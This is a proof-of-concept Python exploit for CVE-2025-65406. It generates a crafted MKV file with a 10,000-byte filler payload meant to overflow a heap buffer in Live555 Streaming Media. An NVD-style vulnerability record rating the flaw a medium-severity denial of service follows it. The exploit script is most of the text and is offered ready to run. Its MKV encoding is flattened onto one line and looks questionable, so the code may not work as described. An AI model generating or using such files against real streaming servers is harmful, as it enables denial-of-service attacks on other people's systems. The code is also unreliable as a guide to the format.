CVE-2025-65406

#!/usr/bin/env python3 # PoC for CVE-2025-65406: Live555 MatroskaFile Heap Overflow # Generate a crafted MKV file to trigger heap overflow in createRTPSinkForTrackNumber() import struct import os def create_ebml_element(element_id, data): """Create an EBML element for MKV format""" size = len(data) # EBML size encoding (simplified) size_bytes = bytes([0x80 | ((size >> (7 * i)) & 0x7F) for i in range(4) if size >> (7 * i) or i == 0]) return element_id + size_bytes + data def create_crafted_mkv(): """Generate a malicious MKV file to trigger heap overflow""" # EBML Header ebml_header = create_ebml_element( b'\x1A\x45\xDF\xA3', # EBML ID create_ebml_element(b'\x42\x86\x81\x01', b'\x01') + # EBMLVersion create_ebml_element(b'\x42\xF7\x81\x01', b'\x04') + # EBMLReadVersion create_ebml_element(b'\x42\xF2\x81\x04', b'\x01') + # EBMLMaxIDLength create_ebml_element(b'\x42\xF3\x81\x08', b'\x01') # EBMLMaxSizeLength ) # Segment header segment = b'\x18\x53\x80\x67' + b'\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF' # Segment ID with unknown size # Create TrackEntry with malicious data to trigger overflow # Crafted track number that triggers the vulnerability track_entry = create_ebml_element( b'\xAE', # TrackEntry create_ebml_element(b'\xD7', b'\xFF') + # TrackNumber (crafted value) create_ebml_element(b'\x86\x39', b'\x01') + # TrackUID create_ebml_element(b'\x83', b'\x01') + # TrackType (video=1) # Crafted CodecName or other field to trigger overflow create_ebml_element(b'\x26\x82\x84', b'A' * 10000) # CodecName with overflow payload ) # Tracks element tracks = create_ebml_element(b'\x16\x54\xAE\x6F', track_entry) # Cluster element (minimal) cluster = create_ebml_element( b'\x1F\x43\xB6\x75', # Cluster create_ebml_element(b'\xE7', b'\x00\x00\x00\x00') + # Timecode b'\x00' # SimpleBlock placeholder ) return ebml_header + segment + tracks + cluster def main(): output_file = 'CVE-2025-65406_poc.mkv' crafted_data = create_crafted_mkv() with open(output_file, 'wb') as f: f.write(crafted_data) print(f'[+] Created malicious MKV file: {output_file}') print(f'[+] File size: {len(crafted_data)} bytes') print('[!] This file can trigger heap overflow in Live555 when processed') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-65406", "sourceIdentifier": "[email protected]", "published": "2025-12-01T17:15:50.260", "lastModified": "2025-12-23T13:45:31.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap overflow in the MatroskaFile::createRTPSinkForTrackNumber() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MKV file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:*", "matchCriteriaId": "C9F01989-4E5A-42B7-8EF7-74E3A5335754"}]}]}], "references": [{"url": "https://github.com/rgaufman/live555", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://shimo.im/docs/1lq7rMrp8lI1vW3e", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}